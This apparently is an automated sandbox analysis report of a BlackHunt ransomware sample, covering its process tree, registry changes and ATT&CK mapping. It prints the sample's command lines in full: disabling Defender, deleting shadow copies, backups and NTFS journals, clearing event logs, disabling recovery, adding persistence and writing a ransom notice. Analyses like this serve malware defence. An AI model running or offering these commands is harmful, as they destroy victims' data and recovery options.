2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 32 PID 2252 wrote to memory of 2612 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 32 PID 2252 wrote to memory of 2224 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 137 PID 2252 wrote to memory of 2224 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 137 PID 2252 wrote to memory of 2224 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 137 PID 2252 wrote to memory of 2224 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 137 PID 2252 wrote to memory of 2508 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 136 PID 2252 wrote to memory of 2508 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 136 PID 2252 wrote to memory of 2508 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 136 PID 2252 wrote to memory of 2508 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 136 PID 2252 wrote to memory of 936 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 226 PID 2252 wrote to memory of 936 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 226 PID 2252 wrote to memory of 936 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 226 PID 2252 wrote to memory of 936 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 226 PID 2608 wrote to memory of 2644 2608 cmd.exe 133 PID 2608 wrote to memory of 2644 2608 cmd.exe 133 PID 2608 wrote to memory of 2644 2608 cmd.exe 133 PID 2252 wrote to memory of 2544 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 33 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe"C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2252 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:1680
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2736
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2612
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2544
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1644
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2512
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1836
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe" /F2⤵PID:2812
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe" /F3⤵
- Creates scheduled task(s)
PID:1336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1828
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:788
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1940
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1016
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:588
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1464
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1252
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:392
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2140
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1964
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2684
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1660
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1640
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2532
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1312
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1300
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1220
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1372
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2656
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:952
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3028
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2104
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2976
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:936
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:2832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2508
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2224
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2768
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2604
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2608
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1972
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2200
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1976
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1984
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3304
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:3592
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:3848
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe"2⤵
- Deletes itself
PID:3872
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:3764
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:3600
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3804
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3048
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3904
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [w4ifO5uDw@gmail.com] AND [Teikobest@gmail.com] " /f2⤵PID:3556
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:3320
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3284
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2788
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3124
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3272
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:236
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:1068
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵
- Modifies registry class
PID:2880
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3544
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:3932
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2876
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:1084
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:936
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:2660
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f1⤵PID:560
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2880
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3632
-
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1172
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:2708
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:2592
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:1968
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:2016
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:1444
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2520
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:2532
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1772
-
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:3032
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:2388
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:904
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2656
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1160
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:2016
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:2088
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:2752
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:976
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:480
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:2268
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:2996
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:2960
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2968
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:1600
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:2816
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:2580
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:2980
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f1⤵
- Adds Run key to start application
PID:2644
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-44608848942226975-1503731876-2120623488-1811277401-12787588531100136051489308905"1⤵PID:2016
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:2636
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2720
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:2112
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:3992
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:3564
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f1⤵PID:3748
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"1⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1768
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F1⤵PID:3936
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3772
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 51⤵
- Runs ping.exe
PID:3688
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [w4ifO5uDw@gmail.com] AND [Teikobest@gmail.com] " /f1⤵PID:3996
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:3888
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt1⤵PID:3752
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f1⤵PID:3420
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:3412
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3680
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2620
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3776
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3560
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\1⤵
- Enumerates connected drives
PID:3256
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\1⤵PID:3268
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-403818770-5787790301460639591395378841-258613901864365312-1950163681211449463"1⤵
- Enumerates connected drives
PID:2708
Network
-
Remote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
144 B 52 B 3 1
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
